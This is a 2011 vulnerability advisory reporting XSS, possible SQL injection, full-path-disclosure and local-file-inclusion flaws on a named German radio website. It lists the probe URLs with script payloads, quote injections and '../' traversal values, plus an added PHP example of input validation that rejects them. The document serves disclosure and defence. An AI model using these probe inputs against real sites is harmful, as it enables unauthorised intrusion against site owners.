SSCHADV2011-010 - Multiple vulnerabilities on http://www.salue.de/
Advisory: | Multiple vulnerabilities on http://www.salue.de/ |
Advisory ID: | SSCHADV2011-010 |
Author: | Stefan Schurtz |
Affected Software: | http://www.salue.de/ |
Vendor URL: | |
Vendor Status: | informed |
CVE-ID: | - |
======================
Vulnerability Description:
======================
The website "http://www.salue.de/" is prone to multiple XSS/SQL/FPD/LFI vulnerabilities.
==============
Technical Details:
==============
Cross-Site-Scripting
http://www.salue.de/nachrichten/indexAudioArchiv.phtml -> Archiv-Suche -> Suchen -> /><script>alert(101.7);</script>
http://www.salue.de/anzeigen/indexRubrik.phtml?rubrik=search&searchBegriff=/><script>alert(101.7);</script> -> Service/News -> nach Begriff suchen
Full-Path-Disclosure
http://www.salue.de/nachrichten/message.phtml?id=’&rubrik=regional
http://www.salue.de/nachrichten/message.phtml?id=27448’&rubrik=’
http://www.salue.de/nachrichten/index.phtml?rubrik=sport’
http://www.salue.de/termineonline/index.phtml?search=true&dayX=15&monthX=9&yearX=aaaaa
http://www.salue.de/inside/team/profil.phtml?path_profil=../
http://www.salue.de/musik/starnews/index.phtml?limit=’
Possible SQL-Injection
http://www.salue.de/nachrichten/message.phtml?id=’&rubrik=regional
http://www.salue.de/nachrichten/message.phtml?id=27448’&rubrik=’
http://www.salue.de/nachrichten/index.phtml?rubrik=sport’
http://www.salue.de/musik/starnews/index.phtml?limit=’
Possible LFI – local file inclusion
http://www.salue.de/inside/team/profil.phtml?path_profil=../
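Server-side handling that would reject the malformed values listed above, as an added example that is not part of the advisory and not the site's code. The parameter names are taken from the URLs; the allowlist values, the profile directory and the table and column names are assumptions.

```php
<?php
// Added example, not the site's code. Parameter names come from the URLs above;
// the allowlist, directory, table and column names are assumptions.
declare(strict_types=1);
const RUBRIKEN = ['regional', 'sport'];
const PROFILE_DIR = '/var/www/profiles';

// FPD: errors go to the log, not into the response body.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// id, limit, dayX, monthX, yearX: accept integers in range, nothing else.
function intParam(array $q, string $name, int $min, int $max): ?int
{
    $v = filter_var($q[$name] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

// rubrik: only values from a fixed allowlist are accepted.
function rubrik(array $q): ?string
{
    $r = $q['rubrik'] ?? null;
    return is_string($r) && in_array($r, RUBRIKEN, true) ? $r : null;
}

// LFI: path_profil is a bare name that must resolve inside PROFILE_DIR.
function profileFile(array $q): ?string
{
    $n = $q['path_profil'] ?? null;
    if (!is_string($n) || !preg_match('/\A[a-z0-9_-]{1,32}\z/', $n)) return null;
    $p = realpath(PROFILE_DIR . '/' . $n . '.html');
    return $p !== false && strpos($p, PROFILE_DIR . '/') === 0 ? $p : null;
}

// SQLi: values are bound as parameters, never concatenated.
function loadMessage(PDO $db, int $id, string $rubrik): ?array
{
    $st = $db->prepare('SELECT title, body FROM messages WHERE id = ? AND rubrik = ?');
    $st->execute([$id, $rubrik]);
    return $st->fetch(PDO::FETCH_ASSOC) ?: null;
}

// XSS: encode when echoing searchBegriff (or any input) back into HTML.
function e(string $s): string { return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }

// Constructed inputs mirroring the requests listed above; each is rejected.
var_dump(intParam(['id' => "27448'"], 'id', 1, PHP_INT_MAX));
var_dump(intParam(['yearX' => 'aaaaa'], 'yearX', 1990, 2100));
var_dump(rubrik(['rubrik' => "sport'"]), profileFile(['path_profil' => '../']));
echo e('/><script>alert(101.7);</script>'), "\n";
```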
=====
Solution:
=====
-
================
Disclosure Timeline:
================
12-Aug-2011 – vendor informed via the e-mail address "media@salue.de" -> no response
12-Aug-2011 – release date of this security advisory
22-Aug-2011 – vendor informed via the e-mail address "stephanie.graesser@salue.de" -> no response
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.salue.de/